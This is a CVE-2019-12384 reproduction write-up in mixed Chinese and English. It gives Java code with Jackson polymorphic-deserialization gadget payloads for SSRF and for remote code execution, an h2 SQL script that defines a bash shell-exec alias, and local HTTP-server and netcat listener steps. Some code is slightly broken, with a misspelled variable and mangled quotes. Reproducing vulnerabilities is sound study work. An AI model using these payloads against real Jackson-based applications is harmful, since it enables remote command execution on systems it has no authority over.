CVE-2019-12384：Jackson反序列化漏洞复现

分析

According to the information mentioned by Jackson developers, triggering this Jackson vulnerability requires meeting the following requirements, so the vulnerability is rated as medium-risk:

The target application receives JSON data sent by an untrusted client

The target application uses polymorphic type processing method to process properties of the java.lang.Object type;

The target application contains at least one "gadget" class that can be utilized in the Java classpath. In this vulnerability, there are a lot of third-party jar packages that depend on. In addition to jackson's own jar package, logback-core and h2 are also needed;

环境搭建

The third-party libraries used in this article are:

jackson-databind 2.9.8

jackson-annotations-2.9.8.jar

jackson-core-2.9.8.jar

logback-core-1.3.0-alpha4.jar

h2 1.4.199

Download it on http://www.mvnrepository.com.

漏洞代码

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

package com.baiyang;

import com.fasterxml.jackson.databind.ObjectMapper;

import com.fasterxml.jackson.databind.SerializationFeature;

import org.h2.Driver;

public class Main {

public static void main(String[] args) {

try {

Class.forName('org.h2.Driver').newInstance();

} catch (Exception e) {

e.printStackTrace();

}

System.out.println('Mapping');

//This payload is used for SSRF reproduction

String SSRF='[\'ch.qos.logback.core.db.DriverManagerConnectionSource\', {\'url\':\'jdbc:h2:tcp://127.0.0.1:4444/~/hacker\'}]';

//This payload is used for reproduction of RCE

String RCE='[\'ch.qos.logback.core.db.DriverManagerConnectionSource\', {\'url\':\'jdbc:h2:mem:TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost/inject.sql'\'}]';

ObjectMapper mapper=new ObjectMapper();

mappper.enableDefaultTyping();

mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

System.out.println('Serializing');

Object obj=null;

try {

//Replace SSRF or RCE to test the payload of SSRF or RCE vulnerability

obj=mapper.readValue(RCE, java.lang.Object.class);

} catch(Exception e) {

e.printStackTrace();

}

System.out.println('objectified');

try {

System.out.println('stringified: ' + mapper.writeValueAsString(obj));

} catch(Exception e) {

e.printStackTrace();

}

}

}

构建步骤

This article generates a project on IDEA

Create a new java Commandline project

Replace the above code with the class

Click the icon in the red box to enter the project structure settings

Follow the steps below to import the downloaded external jar package into the project file

攻击流程

Save the following sql script file as inject.sql

1

2

3

4

5

6

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

String[] command={'bash', '-c', cmd};

java.util.Scanner s=new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter('\\A');

return s.hasNext() ? s.next() : ''; }

$$;

CALL SHELLEXEC('open /Applications/Calculator.app')

Note: In this article, RCE is executed under MacOS. If in other environments, please replace the commands in CALL SHELLEXEC by yourself.

Execute local execution python2 -m SimpleHTTPServer 80, start HTTP service locally

RCE payload测试

Replace the payload in the java file with RCE, compile and run the java program

SSRF payload测试

Execute nc -l -vv 4444 to facilitate observation of SSRF results

Replace the payload in the java file with SSRF, compile and run the java program

参考

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://www.anquanke.com/post/id/182695